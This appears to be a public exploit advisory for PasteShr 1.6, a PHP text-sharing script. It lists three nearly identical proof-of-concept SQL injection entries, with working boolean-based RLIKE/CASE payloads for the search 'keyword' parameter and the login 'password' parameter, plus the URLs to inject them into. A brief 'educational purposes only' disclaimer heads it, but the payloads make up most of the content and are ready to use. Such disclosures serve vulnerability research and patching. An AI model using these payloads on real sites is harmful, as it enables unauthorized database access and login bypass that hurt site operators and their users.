Exploits / Vulnerability Discovered : 2019-05-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Pasteshr 1.6 multiple sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern :
/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
# POST Method :
http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method :
http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
===========================================================================================